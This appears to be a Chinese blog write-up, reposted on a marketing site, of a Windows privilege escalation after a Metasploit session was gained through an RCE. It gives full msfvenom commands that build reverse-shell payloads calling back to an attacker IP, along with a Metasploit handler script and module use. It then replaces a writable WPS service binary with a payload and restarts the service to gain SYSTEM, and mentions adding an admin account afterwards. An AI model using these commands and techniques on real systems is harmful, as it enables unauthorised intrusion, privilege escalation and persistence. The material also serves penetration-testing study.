1、前言在一次測試中,通過rce漏洞獲得了目標主機meterpreter會話,嘗試進行一些提權(quán)實驗。

過程中兩臺機子都不通外網(wǎng),本文記錄一下獲得會話并提權(quán)過程。




2、獲取msf會話生成一個exe載荷,看" />

国产成人精品无码青草_亚洲国产美女精品久久久久∴_欧美人与鲁交大毛片免费_国产果冻豆传媒麻婆精东

15158846557 在線咨詢 在線咨詢
15158846557 在線咨詢
所在位置: 首頁 > 營銷資訊 > 網(wǎng)站運營 > 記一次簡單的win提權(quán)

記一次簡單的win提權(quán)

時間:2023-06-30 13:48:01 | 來源:網(wǎng)站運營

時間:2023-06-30 13:48:01 來源:網(wǎng)站運營

記一次簡單的win提權(quán):



1、前言

在一次測試中,通過rce漏洞獲得了目標主機meterpreter會話,嘗試進行一些提權(quán)實驗。

過程中兩臺機子都不通外網(wǎng),本文記錄一下獲得會話并提權(quán)過程。




2、獲取msf會話

生成一個exe載荷,看情況免殺:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.135 LPORT=443 -f exe -o 666.exe


在準備讓目標機執(zhí)行我們的載荷前,先使用腳本(通過msfpc來生成)來快速監(jiān)聽會話,并進行一些自動進程遷移的工作:

msfconsole -q -r '/home/yanghao/windows-meterpreter-staged-reverse-tcp-443-exe.rc'


腳本內(nèi)容如下:

use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.122.135set LPORT 443set ExitOnSession falseset EnableStageEncoding trueset EnableUnicodeEncoding trueset AutoRunScript 'post/windows/manage/migrate' run -j


參數(shù)的具體含義可以在設置了payload后執(zhí)行show advanced查看:

開始監(jiān)聽:

在目標機上執(zhí)行生成的exe,獲取會話:




3、嘗試提權(quán)

看了下目標已經(jīng)是管理員權(quán)限了,如果要抓密碼的話,得拿到system,準備試試。先ps看一下進程,發(fā)現(xiàn)有殺軟,不過沒關系,沒有外網(wǎng)戰(zhàn)力-50%:

假裝getsystem一下,whoami /priv 查看一下權(quán)限:







localexploitsuggester模塊失敗




試試自帶的模塊來檢查提取漏洞:

use post/multi/recon/local_exploit_suggester


發(fā)現(xiàn)有了一些漏洞,然后就加載對應的利用模塊來進行嘗試:










柳暗花明(enum_services利用)

差不多模塊都試了一下,因為有殺軟的原因,都失敗了。這時候想著找點新的exp來用用,但是網(wǎng)絡不太方便,就先看看主機上的情況,先看了下主機上啟動的服務情況:

use post/windows/gather/enum_services


發(fā)現(xiàn)了一個在D盤的服務

(wpscloudsvr LocalSystem "D:/Program Files/WPS Office/wpscloudsvr.exe" LocalService):




這里我們知道, 在C盤Windows,Program Files等目錄下的文件都會被系統(tǒng)權(quán)限保護,而這個wpscloudsvr服務的可執(zhí)行文件放在了D盤(這也是個很正常的事,總不能啥軟件都往C盤裝吧),

如果軟件開放過程中未對這種類似服務的文件進行權(quán)限限制同時可以對服務進行重啟動,那么就可以利用替換該服務文件的方法來獲得權(quán)限提升。

接下來通過 cacls wpscloudsvr.exe 查看文件權(quán)限,發(fā)現(xiàn)權(quán)限設置不當,標準用戶可以對其更改(圖找不到了,大概結(jié)果就像下面這樣),

同時也可以直接使用net命令對服務進行啟動和停止:







現(xiàn)在條件都滿足了,生成個馬給這個文件替換了,重新啟動服務不就完成提權(quán)了嗎?快速操作中... 1、使用msfvenom生成一個exe-service類型的載荷:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.135 LPORT=8522 -f exe-service -o wpscloudsvr.exe


2、上傳并啟動服務,并獲得了會話:

uplaod /xx/xx/wpscloudsvr.exe "D://Program Files//WPS Office//wpscloudsvr.exe"shell>net start wpscloudsvr


這里就拿到了system權(quán)限的會話了:




后面就是上遠程桌面看看,加個管理員賬戶什么的:







4、總結(jié)

1、使用metasploit腳本進行自動化設置

2、metasploit本地提權(quán)漏洞掃描、利用,相關信息收集模塊使用;

3、服務可執(zhí)行文件權(quán)限設置不當?shù)腸acls檢查、exe-service載荷生成、替換執(zhí)行提權(quán)。




5、參考

https://blog.csdn.net/l1028386804/article/details/86669614

關鍵詞:簡單

74
73
25
news

版權(quán)所有? 億企邦 1997-2025 保留一切法律許可權(quán)利。

為了最佳展示效果,本站不支持IE9及以下版本的瀏覽器,建議您使用谷歌Chrome瀏覽器。 點擊下載Chrome瀏覽器
關閉